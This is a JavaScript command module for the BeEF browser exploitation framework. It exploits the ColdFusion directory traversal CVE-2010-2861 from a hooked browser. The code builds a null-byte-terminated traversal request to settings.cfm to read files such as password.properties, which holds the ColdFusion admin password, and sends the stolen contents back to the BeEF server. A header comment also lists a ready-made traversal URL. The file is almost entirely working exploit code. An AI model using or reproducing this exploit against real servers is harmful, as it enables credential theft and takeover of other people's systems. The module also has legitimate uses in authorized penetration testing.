
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/**
 * ColdFusion Directory Traversal Exploit (CVE-2010-2861) by antisnatchor.
 * Injects a classic directory-traversal payload into the vulnerable "locale" parameter of settings.cfm.
 * By default the exploit retrieves the password.properties file, where the CF admin password is stored;
 * the user is free to specify any other file name, which is appended to the ColdFusion lib directory
 * (e.g. C:\ColdFusion8\lib on Windows, /opt/coldfusion8/lib otherwise).
*
* On a default win installation, the following vector works great:
* http://127.0.0.1:8500/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../../..\ColdFusion8\lib\password.properties%00en
* demo CF application-> http://blogs.sitepoint.com/applications-coldfusion-8/
*/
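/**
 * Fires the CVE-2010-2861 traversal request from the hooked browser against its
 * own origin (document.domain / document.location.port) and reports back to the
 * BeEF server whatever sits between <title> and </title> in the response — the
 * module assumes the vulnerable settings.cfm echoes the traversed file there.
 *
 * Template inputs (substituted server-side by BeEF before this runs):
 *   @fileToRetrieve - file name appended to the ColdFusion lib directory
 *   @os_combobox    - "Windows" selects the C:\ColdFusion<ver>\lib layout,
 *                     anything else selects /opt/coldfusion<ver>/lib
 *   @cf_version     - version suffix of the install directory (e.g. 8)
 *
 * Fixes: all locals were implicit globals; a missing <title> produced
 * substring(6, -1) garbage that was then reported as a successful retrieval.
 */
beef.execute(function() {
  // NOTE(review): the ERB values are spliced into JS string literals unescaped;
  // a quote or backslash in the operator-supplied file name would break this
  // script. Escaping belongs on the module's Ruby side — confirm it is done there.
  var fileToRetrieve = "<%= @fileToRetrieve %>";
  var targetOS = "<%= @os_combobox %>";
  var cfVersion = "<%= @cf_version %>";

  // Enough "../" to reach the filesystem root from the CFIDE directory on both
  // layouts. The trailing %00 is a null-byte truncation: whatever ColdFusion
  // appends after the locale value is cut off, and the "en" tail keeps the
  // value looking like a plausible locale name.
  var traversal = '../../../../../../../../../../../..';
  var uri;
  if (targetOS === "Windows") {
    uri = '/CFIDE/administrator/logging/settings.cfm?locale=' + traversal + '\\ColdFusion' + cfVersion + '\\lib\\' + fileToRetrieve + '%00en';
  } else {
    uri = '/CFIDE/administrator/logging/settings.cfm?locale=' + traversal + '/opt/coldfusion' + cfVersion + '/lib/' + fileToRetrieve + '%00en';
  }

  // Same-origin GET from the hooked page; 10 s timeout, response read as text.
  beef.net.request("http", "GET", document.domain, document.location.port, uri, null, null, 10, 'text', function(response) {
    if (response.status_code !== "success") {
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=ERROR: directory traversal failed.");
      return;
    }

    var body = response.response_body || "";
    var titleStart = body.indexOf("<title>");
    // Search for the closing tag only after the opening one so a stray
    // "</title>" earlier in the body cannot yield a negative-length slice.
    var titleEnd = titleStart === -1 ? -1 : body.indexOf("</title>", titleStart);
    if (titleStart === -1 || titleEnd === -1) {
      // No title element: the page did not echo the file, so do not report
      // a truncated chunk of the body as "retrieved contents".
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=ERROR: no <title> in response; file [" + fileToRetrieve + "] was not echoed.");
      return;
    }

    var exploitResults = body.substring(titleStart + "<title>".length, titleEnd);
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Retrieved contents for file [" + fileToRetrieve + "]: " + exploitResults);
  });
});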